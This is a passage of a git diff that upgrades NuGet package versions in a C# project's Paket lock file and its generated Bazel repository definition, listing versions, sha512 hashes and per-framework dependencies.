@@ -3,64 +3,99 @@ STRATEGY: MIN RESTRICTION: == net9.0 NUGET remote: https://api.nuget.org/v3/index.json - Basic.CompilerLog.Util (0.7.9) - MessagePack (>= 2.5.129) - Microsoft.CodeAnalysis (>= 4.9.2) - Microsoft.CodeAnalysis.CSharp (>= 4.9.2) - Microsoft.CodeAnalysis.VisualBasic (>= 4.9.2) - Microsoft.Extensions.ObjectPool (>= 7.0.13) - MSBuild.StructuredLogger (>= 2.2.235) + Basic.CompilerLog.Util (0.9.3) + MessagePack (>= 2.5.187) + Microsoft.CodeAnalysis (>= 4.11) + Microsoft.CodeAnalysis.CSharp (>= 4.11) + Microsoft.CodeAnalysis.VisualBasic (>= 4.11) + Microsoft.Extensions.ObjectPool (>= 9.0) + MSBuild.StructuredLogger (>= 2.2.243) + System.Buffers (>= 4.6) Humanizer.Core (2.14.1) - MessagePack (2.5.192) - MessagePack.Annotations (>= 2.5.192) + MessagePack (2.5.187) + MessagePack.Annotations (>= 2.5.187) Microsoft.NET.StringTools (>= 17.6.3) - MessagePack.Annotations (2.5.192) - Microsoft.Build (17.8.3) - Microsoft.Build.Framework (>= 17.8.3) - Microsoft.NET.StringTools (>= 17.8.3) - System.Collections.Immutable (>= 7.0) - System.Configuration.ConfigurationManager (>= 7.0) - System.Reflection.Metadata (>= 7.0) - System.Reflection.MetadataLoadContext (>= 7.0) - System.Security.Principal.Windows (>= 5.0) - System.Threading.Tasks.Dataflow (>= 7.0) - Microsoft.Build.Framework (17.8.3) + MessagePack.Annotations (2.5.187) + Microsoft.Bcl.AsyncInterfaces (8.0) + Microsoft.Build (17.12.6) + Microsoft.Build.Framework (>= 17.12.6) + Microsoft.NET.StringTools (>= 17.12.6) + System.Collections.Immutable (>= 8.0) + System.Configuration.ConfigurationManager (>= 8.0) + System.Reflection.Metadata (>= 8.0) + System.Reflection.MetadataLoadContext (>= 8.0) + Microsoft.Build.Framework (17.12.6) Microsoft.Build.Utilities.Core (17.5) Microsoft.Build.Framework (>= 17.5) Microsoft.NET.StringTools (>= 17.5) System.Collections.Immutable (>= 6.0) System.Configuration.ConfigurationManager (>= 6.0) - Microsoft.CodeAnalysis (4.9.2) - Microsoft.CodeAnalysis.CSharp.Workspaces (4.9.2) - 
Microsoft.CodeAnalysis.VisualBasic.Workspaces (4.9.2) + Microsoft.CodeAnalysis (4.12) + Humanizer.Core (>= 2.14.1) + Microsoft.Bcl.AsyncInterfaces (>= 8.0) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.CSharp.Workspaces (4.12) + Microsoft.CodeAnalysis.VisualBasic.Workspaces (4.12) + System.Buffers (>= 4.5.1) + System.Collections.Immutable (>= 8.0) + System.Composition (>= 8.0) + System.IO.Pipelines (>= 8.0) + System.Memory (>= 4.5.5) + System.Numerics.Vectors (>= 4.5) + System.Reflection.Metadata (>= 8.0) + System.Runtime.CompilerServices.Unsafe (>= 6.0) + System.Text.Encoding.CodePages (>= 7.0) + System.Threading.Channels (>= 7.0) + System.Threading.Tasks.Extensions (>= 4.5.4) Microsoft.CodeAnalysis.Analyzers (3.3.4) - Microsoft.CodeAnalysis.Common (4.9.2) + Microsoft.CodeAnalysis.Common (4.12) Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) System.Collections.Immutable (>= 8.0) System.Reflection.Metadata (>= 8.0) - System.Runtime.CompilerServices.Unsafe (>= 6.0) - Microsoft.CodeAnalysis.CSharp (4.9.2) - Microsoft.CodeAnalysis.Common (4.9.2) - Microsoft.CodeAnalysis.CSharp.Workspaces (4.9.2) + Microsoft.CodeAnalysis.CSharp (4.12) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + System.Collections.Immutable (>= 8.0) + System.Reflection.Metadata (>= 8.0) + Microsoft.CodeAnalysis.CSharp.Workspaces (4.12) Humanizer.Core (>= 2.14.1) - Microsoft.CodeAnalysis.Common (4.9.2) - Microsoft.CodeAnalysis.CSharp (4.9.2) - Microsoft.CodeAnalysis.Workspaces.Common (4.9.2) - Microsoft.CodeAnalysis.VisualBasic (4.9.2) - Microsoft.CodeAnalysis.Common (4.9.2) - Microsoft.CodeAnalysis.VisualBasic.Workspaces (4.9.2) - Microsoft.CodeAnalysis.Common (4.9.2) - Microsoft.CodeAnalysis.VisualBasic (4.9.2) - Microsoft.CodeAnalysis.Workspaces.Common (4.9.2) - Microsoft.CodeAnalysis.Workspaces.Common (4.9.2) - Humanizer.Core (>= 2.14.1) - Microsoft.CodeAnalysis.Common (4.9.2) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + 
Microsoft.CodeAnalysis.Common (4.12) + Microsoft.CodeAnalysis.CSharp (4.12) + Microsoft.CodeAnalysis.Workspaces.Common (4.12) + System.Collections.Immutable (>= 8.0) System.Composition (>= 8.0) System.IO.Pipelines (>= 8.0) - System.Threading.Channels (>= 8.0) + System.Reflection.Metadata (>= 8.0) + System.Threading.Channels (>= 7.0) + Microsoft.CodeAnalysis.VisualBasic (4.12) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + System.Collections.Immutable (>= 8.0) + System.Reflection.Metadata (>= 8.0) + Microsoft.CodeAnalysis.VisualBasic.Workspaces (4.12) + Humanizer.Core (>= 2.14.1) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + Microsoft.CodeAnalysis.VisualBasic (4.12) + Microsoft.CodeAnalysis.Workspaces.Common (4.12) + System.Collections.Immutable (>= 8.0) + System.Composition (>= 8.0) + System.IO.Pipelines (>= 8.0) + System.Reflection.Metadata (>= 8.0) + System.Threading.Channels (>= 7.0) + Microsoft.CodeAnalysis.Workspaces.Common (4.12) + Humanizer.Core (>= 2.14.1) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + System.Collections.Immutable (>= 8.0) + System.Composition (>= 8.0) + System.IO.Pipelines (>= 8.0) + System.Reflection.Metadata (>= 8.0) + System.Threading.Channels (>= 7.0) Microsoft.CodeCoverage (17.12) - Microsoft.Extensions.ObjectPool (7.0.13) - Microsoft.NET.StringTools (17.8.3) + Microsoft.Extensions.ObjectPool (9.0) + Microsoft.NET.StringTools (17.12.6) Microsoft.NET.Test.Sdk (17.12) Microsoft.CodeCoverage (>= 17.12) Microsoft.TestPlatform.TestHost (>= 17.12) 
@@ -75,12 +110,12 @@ NUGET Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - Microsoft.Win32.SystemEvents (7.0) Mono.Posix.NETStandard (1.0) - MSBuild.StructuredLogger (2.2.235) + MSBuild.StructuredLogger (2.2.243) Microsoft.Build.Framework (>= 17.5) Microsoft.Build.Utilities.Core (>= 17.5) Newtonsoft.Json (13.0.3) + System.Buffers (4.6) System.Collections.Immutable (8.0) System.Composition (8.0) System.Composition.AttributedModel (>= 8.0) @@ -98,13 +133,10 @@ NUGET System.Composition.AttributedModel (>= 8.0) System.Composition.Hosting (>= 8.0) System.Composition.Runtime (>= 8.0) - System.Configuration.ConfigurationManager (7.0) - System.Diagnostics.EventLog (>= 7.0) - System.Security.Cryptography.ProtectedData (>= 7.0) - System.Security.Permissions (>= 7.0) - System.Diagnostics.EventLog (7.0) - System.Drawing.Common (7.0) - Microsoft.Win32.SystemEvents (>= 7.0) + System.Configuration.ConfigurationManager (8.0) + System.Diagnostics.EventLog (>= 8.0) + System.Security.Cryptography.ProtectedData (>= 8.0) + System.Diagnostics.EventLog (8.0) System.IO (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) @@ -123,16 +155,18 @@ NUGET System.IO.FileSystem.Primitives (4.3) System.Runtime (>= 4.3) System.IO.Pipelines (8.0) + System.Memory (4.5.5) System.Net.Primitives (4.3.1) Microsoft.NETCore.Platforms (>= 1.1.1) Microsoft.NETCore.Targets (>= 1.1.3) System.Runtime (>= 4.3.1) System.Runtime.Handles (>= 4.3) + System.Numerics.Vectors (4.5) System.Reflection.Metadata (8.0) System.Collections.Immutable (>= 8.0) - System.Reflection.MetadataLoadContext (7.0) - System.Collections.Immutable (>= 7.0) - System.Reflection.Metadata (>= 7.0) + System.Reflection.MetadataLoadContext (8.0) + System.Collections.Immutable (>= 8.0) + System.Reflection.Metadata (>= 8.0) System.Runtime (4.3.1) Microsoft.NETCore.Platforms (>= 1.1.1) Microsoft.NETCore.Targets (>= 1.1.3) 
@@ -141,27 +175,23 @@ NUGET Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Security.Cryptography.ProtectedData (7.0) - System.Security.Permissions (7.0) - System.Windows.Extensions (>= 7.0) + System.Security.Cryptography.ProtectedData (8.0) System.Security.Principal (4.3) System.Runtime (>= 4.3) - System.Security.Principal.Windows (5.0) System.Text.Encoding (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Threading.Channels (8.0) + System.Text.Encoding.CodePages (7.0) + System.Threading.Channels (7.0) System.Threading.Tasks (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Threading.Tasks.Dataflow (7.0) + System.Threading.Tasks.Extensions (4.5.4) System.Threading.ThreadPool (4.3) System.Runtime (>= 4.3) System.Runtime.Handles (>= 4.3) - System.Windows.Extensions (7.0) - System.Drawing.Common (>= 7.0) xunit (2.9.2) xunit.analyzers (>= 1.16) xunit.assert (>= 2.9.2) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index 2ec4e25c5f9..413bf68ddf3 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl 
@@ -7,64 +7,64 @@ def main(): nuget_repo( name = "paket.main", packages = [ - {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.7.9", "sha512": "sha512-Z50VRWQIXO0E8GM3ZFdL+Mq+YdmPh+OEJ7bDXPIsp1TQJB07i09WdlEb4MucSz9wG4exeLC3HGt23O3NOFL30g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net7.0": 
["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", 
"Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.3", "sha512": "sha512-hgu/4KttHz9bXOISmomz1uO4WidkXqBbSu4MjVgj3SeJ/bH4t+nkZ5qybpqpZJHf04hdXlyt/ux0OWv5/xEKRQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", 
"Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], 
"netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack", "id": "MessagePack", "version": "2.5.192", "sha512": "sha512-SnrwSQIKWfxcQvzE1TCUPvJ7A/44KFBDcmCc+YUDIq8QalCf0bGAjiBoAFewhJ81QuS5FsCNCOcKn+IURYlbAQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": 
["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net48": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", 
"System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.192", "sha512": "sha512-pE/SD2N0+nDAU8BtTHqjyIhLM2L5Mb0NiO4hW0ybiv2I+BbK0JEaGtbKpeEmOvKT+5s2hds0gvk/GrAHhgcpdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.8.3", "sha512": "sha512-jRz++ltVTU9xGAYSnI7fGwLIsg/AwINaxlXaJrcMszO+fyh1xJ8gKZkDz10foT/5y26jZC6G93wyp85NVHc+lA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": 
["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Security.Principal.Windows", "System.Threading.Tasks.Dataflow", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Security.Principal.Windows", "System.Threading.Tasks.Dataflow", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Security.Principal.Windows", "System.Threading.Tasks.Dataflow", "System.Reflection.Metadata"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Security.Principal.Windows", "System.Threading.Tasks.Dataflow", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.8.3", "sha512": "sha512-xDOoj8lpNohM0Sieo4sJ47m/3SAquclF8wFZeAYYuDRHc8hII4XWPhSafFmw5A4TMGOyV08Z1TrrqES9HxMB3Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], 
"net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net462": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net47": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net471": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net6.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net7.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netcoreapp2.1": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netcoreapp2.2": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netcoreapp3.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netcoreapp3.1": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Build.Utilities.Core", "id": "Microsoft.Build.Utilities.Core", "version": "17.5.0", "sha512": 
"sha512-La1NFQ7SVz1pVGEUnG15BQG26jJkRMCiitySBXLhuTYf9IG6eZ5j5UFjnM4EFKSVKbictRv+D/F0dQtsCiK9ag==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net462": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net47": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net471": ["Microsoft.Build.Framework", 